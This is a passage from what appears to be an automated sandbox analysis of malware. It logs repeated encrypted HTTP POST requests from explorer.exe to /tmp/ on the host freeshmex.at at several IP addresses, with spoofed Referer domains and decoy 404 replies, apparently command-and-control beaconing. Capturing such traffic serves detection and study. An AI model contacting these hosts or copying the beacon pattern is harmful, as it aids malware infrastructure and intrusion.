                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://qmtttoldxo.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 157
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:23.322964907 CET2008OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 04 6b 2c 90 f4 76 0b 75 4d 0c e8 ec
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA ,[k,vuMLfdkn)Vmkk;S%r&YDgj1
                                                        Nov 20, 2022 23:29:23.797904015 CET2009INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:23 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.449699175.119.10.23180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:28:59.421587944 CET149OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://iatco.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 172
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:28:59.423085928 CET150OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 7a 00 c4 e4
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuz~Pnn<wKWBC#nvkYSvXOV51UnBW#K
                                                        Nov 20, 2022 23:29:00.599958897 CET150INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:28:59 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        20192.168.2.449718222.236.49.12380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:24.144349098 CET2010OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://hubudix.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 295
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:24.144644976 CET2010OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 2d 51 b3 8f
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu-QAFQF!>6g*hpST)(_TQ/+IZ+:<)CQB%_z#@T6,bB)E@[:4b
                                                        Nov 20, 2022 23:29:25.349183083 CET2010INHTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:24 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        21192.168.2.449719138.36.3.13480C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:25.591074944 CET2011OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://feciyrtt.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 188
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:25.591377974 CET2012OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 3e 31 ad f5
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu>1.juev2)280j7PB=vB9;-hLGR.$^G*5;&
                                                        Nov 20, 2022 23:29:26.479214907 CET2012INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:26 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        22192.168.2.44972041.41.255.23580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:26.584254980 CET2013OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://mwivfd.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 155
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:26.584254980 CET2013OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 30 2c d8 86
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu0,(dX~EnGj25t2km)P!B=);^g*
                                                        Nov 20, 2022 23:29:27.059041023 CET2014INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:26 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        23192.168.2.449721222.236.49.12380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:27.376996040 CET2015OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://iqeagnejjt.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 154
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:27.377290010 CET2015OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 32 32 c1 a2
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu22yDT`fc9pW+,hnML69h{+J
                                                        Nov 20, 2022 23:29:28.573755026 CET2016INHTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:27 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        24192.168.2.44972241.41.255.23580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:28.678064108 CET2017OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://epgfrxxkra.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 164
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:28.678082943 CET2017OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 66 51 f8 f2
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vufQqy~\;8y}Y&xK3Q!ZjE!>E
                                                        Nov 20, 2022 23:29:29.086935043 CET2018INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:28 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        25192.168.2.449723175.119.10.23180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:29.402513027 CET2019OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://jksmgkjj.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 199
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:29.402838945 CET2019OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 2f 3c eb 91
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu/<S[+w z1F}2d}B!(]*f bH"0_BA9RIjDU
                                                        Nov 20, 2022 23:29:30.610542059 CET2020INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:29 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        26192.168.2.449724210.182.29.7080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:31.517656088 CET2021OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://ctvfqb.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 261
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:31.517844915 CET2021OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 50 15 dd 92
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuP@Fe_"rMSgRl ArB2<|dBIg"r/2N<Z*P#)O0fzowONlxJ&H13
                                                        Nov 20, 2022 23:29:32.595757008 CET2021INHTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:32 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        27192.168.2.449725222.236.49.12380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:33.363390923 CET2022OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://sopric.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 141
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:33.363420010 CET2023OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 66 2a c2 93
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuf*]O[V(bx2Em)g*pOX&VWA
                                                        Nov 20, 2022 23:29:34.293982029 CET2023INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:33 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        28192.168.2.449726175.119.10.23180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:34.630713940 CET2024OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://nyiltqe.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 149
                                                        Host: freeshmex.at
